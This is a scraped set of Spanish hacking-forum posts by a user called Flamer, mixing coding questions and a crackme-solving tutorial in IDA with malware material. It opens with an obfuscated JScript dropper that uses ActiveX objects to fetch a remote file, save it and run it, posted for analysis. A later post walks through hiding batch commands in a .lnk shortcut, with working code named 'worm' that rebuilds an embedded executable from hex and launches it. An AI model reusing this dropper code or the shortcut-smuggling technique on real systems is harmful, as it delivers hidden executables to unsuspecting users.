    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + pqjb[8] + lko.fbmgm + pqjb[4] + lko.fbmgm + rov[7] + sbfwq.yljev + vvbs.rmuqx + bcx[5] + tzyr.spfjs + rov[7] + sbfwq.yljev + opymo.rsdnz + qit[8] + niu.mywhk + yqo[1] + pqjb[4] + tzyr.nayhc
}

function ssdie(n) {
    return rov[16] + niu.fsvd + zhi[0] + put.poihe + lko.fbmgm
}

function mkwm(n) {
    return niu.fih + tzyr.spfjs + divuu.eplv + lko.fbmgm + qit[1] + yqo[1] + put.qcx + zhi[0] + rov[1] + lko.fbmgm
}

function vupzg(n) {
    return rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + qit[8] + rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + glb.nthy + lko.fbmgm + yqo[5] + lko.cpwe + lko.fbmgm + qit[5] + put.poihe + qit[8] + pqjb[7] + qit[8] + kfa[6]
}

function cwk(n) {
    return pqjb[13] + opymo.jjuae + qit[1]
}

function lqlrb(n) {
    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}

function padva(n) {
    return lko.fbmgm
}

function vme(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe
}

function nlc(n) {
    return glb.nthy + lko.fbmgm + qit[5] + vvbs.rmuqx + yqo[1] + vvbs.jnws + qit[5] + lko.fbmgm + opymo.gedag + yqo[1] + put.hykw + opymo.rsdnz
}

function wnpk(n) {
    return niu.mywhk
}

function fqlvs(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + zhi[0] + vvbs.jnws + pnh[10] + qit[8] + put.qcx + zhi[0] + rov[1]
}

function qyno(n) {
    return pqjb[4] + put.hykw + kfo.amuzg + tzyr.nayhc
}

function sehl(n) {
    return rov[12] + yqo[1] + qit[5] + zhi[0] + put.poihe + zhi[0] + yqo[1] + vvbs.jnws
}

function yjf(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + qit[8] + niu.fih + bcx[5] + lko.fbmgm + rov[1] + rov[1]
}

function vssa(n) {
    return vvbs.jnws + pqjb[8]
}

function twy(n) {
    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
}

function frt(n) {
    return put.tsf
}

function ycxqu(n) {
    return tzyr.spfjs + rov[1]
}

function pcf(n) {
    return gba.mgjj + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}

function sekmh(n) {
    return rov[16]
}

function vgjl(n) {
    return pqjb[13] + opymo.jjuae + qit[1]
}

function thpfk(n) {
    return niu.fih + opymo.rsdnz + qit[5] + put.poihe + lko.fbmgm + pqjb[4] + gba.mgjj + sbfwq.yljev + niu.lvg + lko.fbmgm + niu.mywhk + put.poihe
}

function mrfu(n) {
    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
}

function axvhz(n) {
    return niu.fsvd + lko.cpwe + vvbs.jnws
}

function thk(n) {
    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
}

function wzuge(n) {
    return niu.mywhk
}

function yzzhd(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}

function nla(n) {
    return niu.fih + niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + divuu.mse + tzyr.spfjs + pqjb[4] + lko.fbmgm
}

function pgig(n) {
    return niu.fih
}

function yorid(n) {
    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
}

function mizvs(n) {
    return opymo.rsdnz + yqo[1] + rov[1] + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
}

function zgmt(n) {
    return kfo.amuzg
}

function fpu(n) {
    return rov[7] + tzyr.spfjs + pqjb[3] + pqjb[3] + put.poihe + put.hykw + niu.lvg + bcx[5] + zhi[0] + lko.fbmgm + vvbs.jnws + lko.cpwe + sbfwq.yljev + zhi[0] + bcx[10] + rov[7] + niu.lvg + bcx[5] + pqjb[8]
}

function ksp(n) {
    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}

function yhinm(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}

function aic(n) {
    return niu.fih
}

function yhiwo(n) {
    return rov[16]
}

function ilgq(n) {
    return qit[5] + lko.fbmgm + put.poihe + qit[1] + zhi[0] + pqjb[4] + lko.fbmgm + yqo[1] + lko.cpwe + put.poihe + qit[5]
}

function rvl(n) {
    return rwnw.slevm + rov[1] + yqo[1] + qit[5] + lko.fbmgm
}

function ujgwe(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}

function rjg(n) {
    return psp[2] + niu.fih + kfo.tlxoz + psp[2] + pqjb[14] + pucy[3] + qit[8] + kfo.tlxoz + psp[2] + pqjb[14] + put.begwe + qit[1] + qit[1] + rov[12]
}

function nof(n) {
    return qit[5] + lko.cpwe + sbfwq.yljev + qit[5] + put.poihe + niu.fsvd + zhi[0] + vvbs.jnws + pnh[10]
}

function mipjn(n) {
    return qit[1] + opymo.rsdnz + vvbs.rmuqx + lko.fbmgm
}

function eda(n) {
    return pqjb[13] + lko.fbmgm + put.poihe + niu.fih + vvbs.rmuqx + lko.fbmgm + niu.mywhk + zhi[0] + tzyr.spfjs + rov[1] + put.qcx + yqo[1] + rov[1] + put.hykw + lko.fbmgm + niu.fsvd
}

function zxoum(n) {
    return niu.uneo + psp[1] + gba.mgjj + psp[1] + opymo.gedag + qit[8] + niu.fih + put.poihe + niu.fsvd + lko.fbmgm + tzyr.spfjs + pqjb[4]
}

function bsqoi(n) {
    for (var o = [7619, 283, n, vssa(",n1r%SSV_-yZ^")], u = (ycxqu("O1.Ew7OI(-IsmI"), 0); u < 2393; u++)
        for (var t = 0; t < 7169; t++) {
            if (1828 == u) return o[u - 1828 + 2]
        }
    return o[1]
}

function azqp() {
    return new ActiveXObject(rjg("7,$ppXb3Hj"))
}

function nvy() {
    return new Date
}
var pqjb = [241, "Dufzd", 286, "k", "m", "Hnf", 640, "5", "z", 658, 471, "Citte", "c", "G", "L"],
    glb = {
        iuxag: "V",
        nthy: "R",
        fqz: "Jlavq",
        cmzc: "4",
        qvyiw: "F",
        leflp: 393,
        pwalc: 160,
        jxbr: "i",
        lgt: "Pxzt",
        vqne: "O",
        vniif: 892,
        cmg: "Zfrw",
        fffr: "v",
        rrxr: 826,
        dnfj: "("
    },
    psp = ["0", "D", "M", "Ztzh", "Vmh", 293, "W", 311, "6"],
    lko = {
        nnff: "L",
        cpwe: "u",
        euf: "Yuu",
        tux: 936,
        fbmgm: "e",
        ecjw: "Z",
        qvvff: "1828"
    },
    vvbs = {
        phg: 520,
        rmuqx: "p",
        yubsx: "Ruiak",
        bnzv: 890,
        niy: "7169",
        jnws: "n",
        ywqc: 919,
        orx: 469,
        ejk: 948,
        thnn: 562,
        oceqj: "Not",
        kjhlw: "Cfd",
        hpfbk: "Cqa"
    },
    opymo = {
        docm: ":",
        uro: "60000",
        idqx: "Hsy",
        gacqa: "1",
        jjuae: "E",
        udrn: 919,
        bqjtz: "Date",
        zpb: 146,
        rsdnz: "y",
        gedag: "B",
        bde: 151,
        zfy: "eval"
    },
    yqo = ["K", "o", "Parxh", 115, 597, "q", "p", 900, "Zvlbb", "c"],
    pucy = ["2", 911, "2393", "2", "Ijrl", "8", 572],
    kfa = ["J", "Tpgqs", "Yfz", "3", "Dadem", "Exra", "1", "Qvzc", 800, "Yjylt", 433, 585, "Rhbfr", "m", "Coxuw", "r", "r"],
    sbfwq = {
        kru: 726,
        jhmia: "Bebrr",
        zzp: "Sjq",
        lvyv: "T",
        tldql: 907,
        yljev: "b",
        ymo: "Azzx"
    },
    qit = ["Gon", "T", "e", "E", "Hka", "s", "Asc", "E", ".", 80, 727, 248, "2", "e", "r", "4"],
    rov = ["Lgge", "l", 54, "Tskh", "$", 91, "Eghv", "x", "7", 705, "200", "Ozby", "P", "Eixr", ";", "Okhay", "W"],
    isksi = {
        benn: 478,
        sdo: "F",
        pkadk: "3",
        pkrlp: "H",
        aaw: 713,
        upu: "Uov",
        btx: "Vzl"
    },
    tzyr = {
        nayhc: "/",
        nja: "-",
        rhn: 182,
        acgb: 804,
        tdfil: "o",
        azis: "Jutn",
        spfjs: "a",
        nxqlb: "Maj",
        imsao: 995
    },
    pnh = [103, "Mkbt", "w", "5", "A", "Udxc", "Mkhlf", 193, "%", "Nfjw", "g", 161, "J", "i", 316, 593],
    gba = {
        ariae: "Nnk",
        qwxv: "2",
        mzd: 347,
        lrj: "D",
        xba: 817,
        njrs: "Gwjcf",
        cvu: "1200000",
        izgfd: "S",
        zrjc: "Gdqid",
        iatqy: "g",
        yrxhc: "May",
        mgjj: "O",
        tlvvq: "E"
    },
    bcx = ["O", "Ctqo", "Mnj", 998, "289", "h", 883, "Taqis", "Fysx", "Eclw", "w", 844, "Litn", 559],
    divuu = {
        mse: "N",
        mwdpo: 718,
        eso: "F",
        eplv: "v",
        ftcn: "Ont",
        iftxt: "b",
        mgwqa: 491,
        fnhs: 928,
        oob: "Y",
        fdjm: 225,
        rdpeg: "Wlbe",
        qhmy: 945,
        pnv: "30000",
        mxnu: "Bhnem",
        qct: "M",
        puokp: "283"
    },
    zhi = ["i", "n", "Jkh", 993, 415, "597"],
    niu = {
        sjmkx: "%",
        fsvd: "r",
        mxq: "f",
        suy: "F",
        wxjh: "l",
        lvg: "j",
        tgy: "Jxqf",
        fih: "S",
        mywhk: "c",
        uneo: "A",
        tyscc: 331,
        chz: 885,
        cviwo: "Bavuc",
        grk: "!",
        otvcq: "Sdyw",
        bkypx: "Jmn",
        rap: 558,
        kpfgu: 965
    },
    rwnw = {
        soqvz: 690,
        jpjv: "Ipgkx",
        nqnk: "Xguxt",
        jurt: 966,
        tzdmn: 187,
        wozz: "Jxmg",
        qxlpk: "Twrj",
        kfc: "J",
        slevm: "C",
        nfgwb: 918,
        ohz: "Hwqrt",
        xnrh: "Ajx",
        mgi: "J",
        punj: 364,
        uey: "2",
        jrkzz: 664
    },
    put = {
        ibb: 68,
        poihe: "t",
        tsf: "\\",
        begwe: "H",
        sxwc: 115,
        tzxjt: "s",
        xqor: "*",
        bbf: "ActiveXObject",
        qcx: "F",
        dzy: "V",
        pjb: "7619",
        pmged: "*",
        wvduv: "K",
        ifbd: "Iqxpc",
        hykw: "d",
        pgt: "F",
        cvi: 848
    },
    kfo = {
        krrxd: "(",
        tbcl: 507,
        tlxoz: "X",
        amo: "Tos",
        amuzg: " ",
        zns: "A",
        zvqln: 14,
        cocmt: "Yrcje",
        kstve: 278
    },
    lcza = [-597],
    ymdeu = [289],
    hkjyt = [],
    bigjj = [7],
    ahunl = [];
ahunl[0] = wmnhg("deoLbw$Aca_");
for (var nngl = [0], ael = [mizvs("ZbvNEXgH))f")], hdqk = !1, ephrk = bsqoi(pgig(")g.6j1Xt^rKI5")), xeu = eval(sekmh("2oO25X_m7:+z") + ephrk + vme("n*&xINca.4m,0")), faefr = ActiveXObject, dykkd = bsqoi(aic("&96t3k-uvdL.DE")), lye = 0; lye < ahunl[thk("W%JCQ3myM01ki4Z")]; lye++) {
    var gzsn = bsqoi(padva("uHY$X1ghzz^gIp*")),
        hre = new faefr(dykkd + fqlvs("R2GC6!mM(:,^7") + gzsn + thpfk("cc5cN6kL%n%Af"));
    try {
        var xvxb = hre[eda("+L01EvS-k2gNj")](2),
            nco = new faefr(vupzg("Gb&;CYxSb-")),
            cbic = 3e4,
            dslh = 6e4,
            phyg = 3e4,
            ncz = 12e5;
        nco[ilgq("2.ddPpkd%%")](cbic, dslh, phyg, ncz);
        try {
            for (; fpu("Pv^D4gcfmo8");) {
                var voyg = azqp();
                if (voyg[lqlrb("0,IH_$wKM51b)E")](cwk(".-Q(jqSKfQ$)Z"), plh("8D2w0E*D*bG"), !1), voyg[yorid("9^($osbnH1f*aLL")](), 200 != voyg[yhinm("QS9EhlGR2:u4e")]) break
            }
        } catch (n) {}
        if (5 == nngl[lye]) {
            var umjf = xeu[nla("ZbsKQkX582TO")],
                row = umjf[nof("VHNyeMELz%Sm^Nn")](0, umjf[mrfu("sz+7M6Su,!@QH.l")] - 3);
            ahunl[lye] += row
        }
        xvxb += frt("9@O_6.t^e_Ux80"), xvxb += ael[lye];
        var mlh = 5;
        do {
            nco[ksp("U6uOcmHDTV")](vgjl("v2iV$^O:geUD@"), ahunl[lye], 0), nco[twy("ME(bHjfii,C!yv")](), mlh--
        } while (200 != nco[ujgwe("S1E7.*Hnj8TZ")] && mlh);
        if (200 == nco[yzzhd("P(SlasP2Ik7")]) {
            var ozefl = new faefr(yhiwo("Uo$Mu;z!!:2D") + ephrk + yjf("xe5LT.($QI"));
            if (8 == nngl[lye] && (nngl[lye] = 0), nngl[lye] <= 3) {
                var dzpj = new faefr(zxoum("a6XKUWTxbiy3AZ("));
                dzpj[pcf("!9w9oSyDg)(e0")](), dzpj[mipjn("zKCmP;87XLBfq:S")] = 1, dzpj[sehl("C8DnpB4%x@-8j*R")] = 0, dzpj[ssdie("W1IZ@l%z-P")](nco[nlc("PchLD7hONF53")]), dzpj[mkwm("nl4zGi!QzjC;V")](xvxb), dzpj[rvl("6-OC&xsf60(t7")](), nngl[lye] || ozefl[axvhz("n(LZAZLoC)r")](bsqoi(wzuge("1vqBn*0MR)z")) + qyno("@L&E^tromug") + bsqoi(wnpk("k(@h%.q!aTO84X")) + zgmt(":dIflb($+-Z7!!!") + xvxb, 0, 0)
            }
        }
    } catch (n) {}
}




saludos Flamer y a ver quien me ayuda o le na se la carcomita de que hace este codigo

MOD: URL modificada para evitar clicks indeseados.
#28
Hola amigos ando buscando el crackme 2 de devastador por si alguien lo tiene que me lo pase ya que se callo el link donde tenia la solucion y quiero hacerle video

#29
hola amigos como la pagina http://www.crackmes.de/ esta fuera de servicio hace ya algún tiempo, aquí les traigo un espejo de ella y es esta pagina, es una copia de la original

http://crackmes.cf/

http://crackmes.cf/archive/

http://crackmes.cf/users/

bueno saludos y espero le sirva a alguien
#30
hola quiero hacer una operacion con el comando split pero quiero que el resultado sea almacenado en una matriz ejemplo

tengo esta variable llamada cadena que es igual a

Código (vbnet) [Seleccionar]

dim cadena as string = "0-1-2-3-4-5-6-7-8-9"


y declaro una matriz de 1x10 así

Código (vbnet) [Seleccionar]

dim matriz(1,9) as string


quiero hacer split y que el resultado sea almacenado en la posicion 0 hasta 10 de la matriz sin hacer esto

Código (vbnet) [Seleccionar]

dim vector() as string

vector=split(cadena,"-")
for x=0 to 9
  matriz(0,x)=vector(x)
next


para que me entiendan quiero aguardar el vector en una fila de la matriz

Saludos Flamer y quiero ahorrarme el ciclo
#31
hola amigos hoy se me ocurrió una idea y es que común mente en cualquier lenguaje de programación si queremos concatenar 2 cadenas se ase lo siguiente

Nota: puse el signo mas para que se entendiera, no me estoy refiriendo a ningún lenguaje en particular

Código (xml) [Seleccionar]

cadena3=cadena1 + cadena2


si cadena1 vale "01234" y cadena2 vale "56789" entonces el resultado de cadena3 seria "0123456789" eso es para todos los lenguaje


ahora volbiendo al tema, si tenemos que cadena1 es igual a
"
0
1
2
3
4
"

y cadena2 es igual a

"
5
6
7
8
9
"
ahora hacemos la concatenación que no se como es y es lo que quiero que me digan si se puede, quiero que el resultado sea este
"
05
16
27
38
49
"

a eso me refiero si se puede hacer

saludos Flamer

#32
Anteriormente había dicho que no haría tutorial de el crackme 3 de EnigmaGroup pero como trato de aprender IDA are una excepción y resolveré el crackme con IDA-Pro.

bueno si no tienen el crackme lo pueden descargar desde su pagina oficial esta:

https://www.enigmagroup.org/pages/cracking

ahora ya que descargaron el crackme pasaremos abrirlo con IDA, pero una cosa muy importante antes de intentar crackear un programa con IDA deben de saber si el programa o crackme es de 32 o 64 bits.

una solución para saber si el crackme es de 32 o 64 bit es abrirlo con el RDG Detector, así que ami al abrirlo con el me sale la siguiente imagen



y como ven donde esta marcado de rojo dice que es de 32 bits, asi que al abrirlo con IDA lo abriremos con IDA 32 bits que es esta.



para los que no saben IDA te instala 2 versiones por eso es muy importante saber que versión es el programa que queremos reversear.

A continuación nos aparecerá una pantalla la cual daremos clic en New



acto seguido ubicaremos el crackme 3 de enigma group, el cual yo lo tengo en la carpeta descargas



después damos clic en abrir y se abrirá la siguiente ventana donde seleccionamos la primera opción y damos clic en OK



bueno ya con esto tendremos el crackme abierto y listo para crackear así que primero buscaremos en las apis que utiliza el crackme para comparar los seriales y para eso nos iremos ala pestaña Imports y nos muestra lo siguiente



Como ven utiliza la misma api que en los crackmes anteriores.

bueno una cosa muy importante no se asusten ya que IDA es mas extenso y laborioso que ollydbg, ya que tiene mas instrucciones pero poco a poco iremos aprendiendo ya que yo todavía no lo domino y una de las cosas que extraño de el ollydbg que no distingo las instrucciones de otras ya que en el desensamblado que mas adelante les presentare, todas las instrucciones tienen el mismo color y no se distinguen a simple vista tengo que seleccionarlas y para eso ando fijando mucho la vista en fin ojala en versiones futuras mejoren eso.

ahora para no andar buscando en el desensamblado la api  __vbaVarTstEq haremos lo siguiente, nos iremos a la pestaña IDA View-A  que es la que nos muestra el desensamblado del programa



y como verán es muy distinto a el ollydbg pero como dije no se asusten que todo tiene remedio, bueno ya que estamos aqui nos iremos al icono siguiente



también pueden dar clic en la pestaña Search y buscar la opción Text la cual tiene el mismo icono que seleccionamos.

a continuación muestra la siguiente ventana



y escribimos el nombre de la api que deseamos encontrar y marcamos las mismas instrucciones y al ultimo presionamos OK

después de esto se abrirá una nueva pestaña donde nos muestra las direcciones donde se utiliza dicha api, así que yo ubique el call donde se hacen las comparaciones de las cadenas el cual para eso fui analizando cada resultado que me dio la búsqueda y es este



para irnos a esa dirección solo damos clic sobre el y nos redirige hasta esta ubicación



Asi que ya tenemos ubicado donde compara las string, asi que para eso pondremos un break-point y tracearemos con F7 igual que ollydbg y para eso solo damos clic al circulo azul de esa linea hasta que se haga rojo y nos marque la linea asi



y ahora pasaremos a ejecutar la aplicación con F9 y si les aparece la siguiente ventana seleccionamos la siguiente opción



Damos OK y por ultimo volvemos a presionar F9

Ahora si nos aparece la ventana del crackme y así que ingresaremos la contraseña que sea, yo ingresare "123456" y presionamos el botón submit



al presionar el botón el programa se detiene justo en el break-point que pusimos este



ahora presionaremos F7 para ingresar en el CALL e ir revisando la pila o stack

Nota: para ir revisando que es lo que se encuentra en el stack iremos dando clic sobre las instrucciones que digan Debug como estas



y el contenido es mostrado en la sección del DUMP

Bueno asi que al tracear con F7 e llegado a la siguiente sección



y al pararme en esta linea reviso el stack o pila y veo que me muestra lo siguiente



y presiono sobre la primera y me muestra lo siguiente en el Dump



ahora presiono la segunda



y guala la clave es "Debug54321" y al ingresar esa clave en el crackme me muestra lo siguiente



Bueno eso es todo amigos espero les haya gustado

Saludos Flamer
#33
Este tema lo publique en mi blog y ahora se los traigo aqui para el abril negro

Ase mucho en mis principios uní un archivo lnk con un exe este era ejecutable desde el lnk, asiendo doble clic sobre el y ahorita que me acuerdo yo en ese entonces usaba el comando debug del antiguo símbolo del sistema para recrear el ejecutable.

trate este tema en el siguiente hilo

https://foro.elhacker.net/analisis_y_diseno_de_malware/unir_autorun_y_exe-t271077.10.html

en el un usuario me tomo a locura lo que estaba diciendo eso fue 2009 pero yo cuando había hecho esos experimentos por llamarlos así hacia mas años, aun no recuerdo si seria en el 2007 o 2006 y como dije usaba el comando debug, yo nunca dije en el foro como lo hice hasta ahora lo explico.

primeramente crearemos un acceso directo al símbolo del sistema en el escritorio, no explicare como crearlo creo que ya tienen las bases suficientes para saber.

ya que lo tengan creado daremos clic derecho sobre el y daremos clic en propiedades y en el cuadro de texto de destino que es este:



pondremos lo siguiente

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

y ahora abriremos el bloc de notas y dentro de el pondremos los comandos de nuestro bat, yo pondré estos



OJO= fíjense que deje un espacio de 3 lineas y después puse los comandos pueden ser 2 o una, esto es para que no se mezcle con los bites del lnk.

ahora pasaremos a aguardarlo, yo le pondré 96.txt, ya que no es necesario que lleve la extensión bat

ya que tenemos el archivo lnk y los comandos que irán debajo del lnk pasaremos a juntar los, para eso abriremos el símbolo del sistema y nos fijamos en la carpeta del escritorio y teclamos lo siguiente

Nota: mi archivo lnk tiene por nombre "6.lnk" y el archivo que lleva los comandos se llama "96.txt"

copy /b 6.lnk+96.txt w.lnk

nos que daría un archivo llamado "w.lnk", que al ejecutarlo ejecuta los comandos que tenia el archivo 96.txt.

creo que ya tienen una idea de como seguir, así que crearemos un bat que genere un archivo vbs, el cual generara un exe así que el código del bat seria este

Código (dos) [Seleccionar]


@echo off
echo option explicit                                           >worm.vbs
echo Dim x,objsystem,file,i,f,largo,bit,bytes,shell            >>worm.vbs 
echo Set objsystem = CreateObject("Scripting.FileSystemObject")>>worm.vbs
echo set shell = createobject("wscript.shell")                 >>worm.vbs
echo Set file = objsystem.getFile("w.lnk")                     >>worm.vbs 
echo largo=file.size                                           >>worm.vbs
echo Set f = file.OpenAsTextStream()                           >>worm.vbs 
echo for i=1 to largo                                          >>worm.vbs
echo     bytes = bytes + f.read(1)                             >>worm.vbs 
echo next                                                      >>worm.vbs
echo f.close                                                   >>worm.vbs
echo bit=split(bytes,"==codingvbs==")                          >>worm.vbs 
echo set file = objsystem.createtextfile("Crackme1.exe")       >>worm.vbs
echo for x=1 to len(bit(2)) step 2                             >>worm.vbs
echo    bytes = mid(bit(2),x,2)                                >>worm.vbs
echo    file.write(chr("&H" + bytes))                          >>worm.vbs
echo next                                                      >>worm.vbs
echo file.close                                                >>worm.vbs
echo wscript.sleep 2000                                        >>worm.vbs
echo shell.run "Crackme1.exe",1                                >>worm.vbs
wscript.exe worm.vbs


al bat lo llamaremos "comandos.bat", ahora crearemos un archivo que contendra los bites del exe en valores hexa decimales, al cual llamaremos "code.txt" y contendrá lo siguiente

Código (ini) [Seleccionar]

==codingvbs==4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000008F8AF9DBCBEB9788CBEB9788CBEB978848F79988CAEB9788A2F49E88CAEB978822F49A88CAEB978852696368CBEB97880000000000000000504500004C0103007180B7430000000000000000E0000F010B01060000200000002000000000000008120000001000000030000000004000001000000010000004000000010000000400000000000000005000000010000044DF00000200000000001000001000000000100000100000000000001000000000000000000000004426000028000000004000001406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280200002000000000100000A80000000000000000000000000000000000000000000000000000002E746578740000008C190000001000000020000000100000000000000000000000000000200000602E64617461000000040A0000003000000010000000300000000000000000000000000000400000C02E727372630000001406000000400000001000000040000000000000000000000000000040000040C52C25411000000000000000000000004D535642564D36302E444C4C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FCB149738D69497373104A734E624973D568497324734773E14B3C7302624973A7663C732C453C73E3423C73292F48739A6249739A63497364B34973AF443C736FD83B7378B73B738A69497385E33C7309B449737C6747735B4E3C731D6649734E6349737F9D4A73A1B24973CE624973CE63497309644873026349733D5D49733EDE3A73CA164A73DC9D4A7336B14973EA204973BAB44973350F4973FE473C73D7503C73000000001500100002234000000000000A234000C0104000000000000100000001000000DA224000000000007DC39425AD49B25405000800E423400000000000EB23400005000800E324400000000000EA24400005000800F425400000000000FB2540000000000000000000FF253C104000FF2558104000FF2564104000FF2530104000FF251C104000FF256C104000FF250C104000FF257C104000FF2534104000FF2578104000FF2570104000FF2560104000FF2548104000FF255C104000FF2510104000FF2504104000FF258C104000FF2500104000FF2598104000FF2568104000FF2538104000FF2550104000FF2594104000FF2590104000FF2544104000FF2508104000FF2584104000FF252C104000FF2514104000FF2520104000FF25A0104000FF259C104000FF2518104000FF2528104000FF2574104000FF2524104000FF2588104000FF2554104000FF2540104000FF254C104000FF2580104000000068F4164000E8EEFFFFFF000000000000300000004000000000000000A1B68322BCF5C74EA7E4A3927EB7E3510000000000000100000000000000000050726F796563746F310000000000000000000000FFCC310003FE22228A455D81448B4E885B15F0513142E3E915F7541E4B93B8F05E7BD708073A4FAD339966CF11B70C00AA0060D393000000000000000000000000000000000000000000000000000000000000000000000000E803000062030000000500466F726D31000D011D002020202020437261636B6D65202337202020506F722020466C616D6572001901004200220123060300006C740000FE0200000000010001002040000001000400E8020000160000002800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F